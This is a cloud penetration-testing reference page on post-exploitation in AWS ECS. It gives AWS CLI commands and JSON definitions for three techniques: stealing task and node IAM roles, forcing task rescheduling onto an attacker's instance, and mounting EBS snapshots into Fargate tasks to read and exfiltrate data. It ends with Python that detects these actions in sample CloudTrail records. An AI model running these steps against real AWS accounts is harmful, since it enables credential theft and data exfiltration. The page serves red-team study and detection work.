AWS - ECS Post Exploitation


tip

Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

ECS

For more information check:

AWS - ECS Enum

Host IAM Roles

In ECS, an IAM role can be assigned to the task running inside the container. If the task runs inside an EC2 instance, the EC2 instance will have another IAM role attached to it.
This means that if you manage to compromise an ECS instance you can potentially obtain the IAM role associated to the ECR and to the EC2 instance. For more information about how to get those credentials check:

Cloud SSRF - HackTricks

caution

Note that if the EC2 instance is enforcing IMDSv2, as stated in the docs, the response to the PUT request will have a hop limit of 1, making it impossible to reach the EC2 metadata from a container running inside the EC2 instance.

Privesc to node to steal other containers creds & secrets

Moreover, EC2 uses docker to run ECS tasks, so if you manage to escape to the node or access the docker socket, you can check which other containers are running, and even get inside them and steal their attached IAM roles.

Making containers run in current host

Moreover, the EC2 instance role usually has enough permissions to update the container instance state of the EC2 instances used as nodes inside the cluster. An attacker could set the state of an instance to DRAINING; ECS will then remove all the tasks from it, and the ones running as REPLICA will be scheduled on a different instance, potentially the attacker's instance, so he can steal their IAM roles and any sensitive information present inside the container.

```bash
aws ecs update-container-instances-state \
--cluster <cluster> --status DRAINING --container-instances <container-instance-id>
```

The same technique can be performed by deregistering the EC2 instance from the cluster. It is potentially less stealthy, but it will force the tasks to be executed on other instances:

```bash
aws ecs deregister-container-instance \
--cluster <cluster> --container-instance <container-instance-id> --force
```

The last technique to force the re-execution of tasks is to tell ECS that a task or container was stopped. There are 3 possible APIs to do this:

```bash
# Needs: ecs:SubmitTaskStateChange
aws ecs submit-task-state-change --cluster <value> \
--status STOPPED --reason "anything" --containers [...]

# Needs: ecs:SubmitContainerStateChange
aws ecs submit-container-state-change ...

# Needs: ecs:SubmitAttachmentStateChanges
aws ecs submit-attachment-state-changes ...
```

Steal sensitive info from ECR containers

The EC2 instance might also have the permission ecr:GetAuthorizationToken, which allows it to download images (you can search for sensitive information inside them).

Attach an EBS snapshot directly into an ECS task (configuredAtLaunch + volumeConfigurations)

Abuse the native ECS EBS integration (2024+) to attach the contents of an existing EBS snapshot directly into a new ECS task/service and read its data from inside the container.

  • Required (minimum):
    • ecs:RegisterTaskDefinition
    • One of: ecs:RunTask OR ecs:CreateService/ecs:UpdateService
    • iam:PassRole on:
      • The ECS infrastructure role used for volumes (policy: service-role/AmazonECSInfrastructureRolePolicyForVolumes)
      • The task execution/task roles referenced by the task definition
    • If the snapshot is encrypted with a CMK: KMS permissions for the infra role (the AWS managed policy above includes the required KMS grants for AWS managed keys).
  • Impact: read any disk contents from the snapshot (e.g., database files) inside the container and exfiltrate them via the network/logs.

Steps (Fargate example):

  1. Create the ECS infrastructure role (if it does not exist) and attach the managed policy:

```bash
aws iam create-role --role-name ecsInfrastructureRole \
--assume-role-policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"ecs.amazonaws.com"},"Action":"sts:AssumeRole"}]}'
aws iam attach-role-policy --role-name ecsInfrastructureRole \
--policy-arn arn:aws:iam::aws:policy/service-role/AmazonECSInfrastructureRolePolicyForVolumes
```

  2. Register a task definition with a volume declared as configuredAtLaunch and mount it in the container. Example (prints the secret then sleeps):

```json
{
"family": "ht-ebs-read",
"networkMode": "awsvpc",
"requiresCompatibilities": ["FARGATE"],
"cpu": "256",
"memory": "512",
"executionRoleArn": "arn:aws:iam::<ACCOUNT_ID>:role/ecsTaskExecutionRole",
"containerDefinitions": [
{"name":"reader","image":"public.ecr.aws/amazonlinux/amazonlinux:latest",
"entryPoint":["/bin/sh","-c"],
"command":["cat /loot/secret.txt || true; sleep 3600"],
"logConfiguration":{"logDriver":"awslogs","options":{"awslogs-region":"us-east-1","awslogs-group":"/ht/ecs/ebs","awslogs-stream-prefix":"reader"}},
"mountPoints":[{"sourceVolume":"loot","containerPath":"/loot","readOnly":true}]
}
],
"volumes": [ {"name":"loot", "configuredAtLaunch": true} ]
}
```

  3. Create or update a service, passing the EBS snapshot via volumeConfigurations.managedEBSVolume (requires iam:PassRole on the infra role). Example:

```json
{
"cluster": "ht-ecs-ebs",
"serviceName": "ht-ebs-svc",
"taskDefinition": "ht-ebs-read",
"desiredCount": 1,
"launchType": "FARGATE",
"networkConfiguration": {"awsvpcConfiguration":{"assignPublicIp":"ENABLED","subnets":["subnet-xxxxxxxx"],"securityGroups":["sg-xxxxxxxx"]}},
"volumeConfigurations": [
{"name":"loot","managedEBSVolume": {"roleArn":"arn:aws:iam::<ACCOUNT_ID>:role/ecsInfrastructureRole", "snapshotId":"snap-xxxxxxxx", "filesystemType":"ext4"}}
]
}
```

  4. Once the task starts, the container can read the snapshot contents at the configured mount path (e.g., /loot). Exfiltrate via the task's network/logs.

Cleanup:

```bash
aws ecs update-service --cluster ht-ecs-ebs --service ht-ebs-svc --desired-count 0
aws ecs delete-service --cluster ht-ecs-ebs --service ht-ebs-svc --force
aws ecs deregister-task-definition ht-ebs-read
```
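As an added defender-side example (not part of the original page or any HackTricks tooling), the following Python triages CloudTrail records for the two behaviours described above: the task-eviction calls (instance-role sessions issuing UpdateContainerInstancesState/DeregisterContainerInstance, or Submit*StateChange issued from the CLI instead of the ECS agent) and RunTask/CreateService/UpdateService requests that mount an EBS snapshot through managedEBSVolume. The records are constructed samples, and the "aws-cli" user-agent heuristic is an assumption to tune per environment.

```python
# Constructed CloudTrail-style records (not real AWS events) exercising each path.
SAMPLE_RECORDS = [
    {"eventName": "UpdateContainerInstancesState", "eventSource": "ecs.amazonaws.com",
     "userIdentity": {"arn": "arn:aws:sts::111122223333:assumed-role/ecsInstanceRole/i-0abc123"},
     "requestParameters": {"cluster": "prod", "status": "DRAINING"}},
    {"eventName": "SubmitTaskStateChange", "eventSource": "ecs.amazonaws.com",
     "userAgent": "aws-cli/2.15.0 Python/3.11",
     "userIdentity": {"arn": "arn:aws:sts::111122223333:assumed-role/ecsInstanceRole/i-0abc123"},
     "requestParameters": {"cluster": "prod", "status": "STOPPED", "reason": "anything"}},
    {"eventName": "CreateService", "eventSource": "ecs.amazonaws.com",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/dev"},
     "requestParameters": {"cluster": "ht-ecs-ebs", "volumeConfigurations": [
         {"name": "loot", "managedEBSVolume": {"snapshotId": "snap-0123456789abcdef0"}}]}},
    {"eventName": "UpdateContainerInstancesState", "eventSource": "ecs.amazonaws.com",
     "userIdentity": {"arn": "arn:aws:sts::111122223333:assumed-role/DeployPipeline/codebuild-1"},
     "requestParameters": {"cluster": "prod", "status": "DRAINING"}},  # legitimate automation
]

EVICTION_EVENTS = {"UpdateContainerInstancesState", "DeregisterContainerInstance"}
AGENT_EVENTS = {"SubmitTaskStateChange", "SubmitContainerStateChange",
                "SubmitAttachmentStateChanges"}
SNAPSHOT_EVENTS = {"RunTask", "CreateService", "UpdateService"}

def is_instance_session(arn):
    # EC2 instance-profile credentials yield an STS session named after the
    # instance id, e.g. .../assumed-role/ecsInstanceRole/i-0abc123
    return ":assumed-role/" in arn and arn.rsplit("/", 1)[-1].startswith("i-")

def analyse_record(rec):
    """Return (rule, detail) for a suspicious ECS CloudTrail record, else None."""
    if rec.get("eventSource") != "ecs.amazonaws.com":
        return None
    name = rec.get("eventName", "")
    params = rec.get("requestParameters") or {}
    actor = rec.get("userIdentity", {}).get("arn", "")
    if name in EVICTION_EVENTS and is_instance_session(actor):
        # A node draining/deregistering itself or a peer is the eviction trick above
        return ("node-evicts-node", f"{name} by {actor} on {params.get('cluster')}")
    if name in AGENT_EVENTS and "aws-cli" in rec.get("userAgent", "").lower():
        # Assumption: only the ECS agent should call Submit*; CLI use is manual
        return ("manual-state-change", f"{name} status={params.get('status')} by {actor}")
    if name in SNAPSHOT_EVENTS:
        for vol in params.get("volumeConfigurations") or []:
            snap = (vol.get("managedEBSVolume") or {}).get("snapshotId")
            if snap:
                return ("snapshot-mounted", f"{name} mounts {snap} as {vol.get('name')} by {actor}")
    return None

def triage(records):
    return [f for f in map(analyse_record, records) if f]
```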
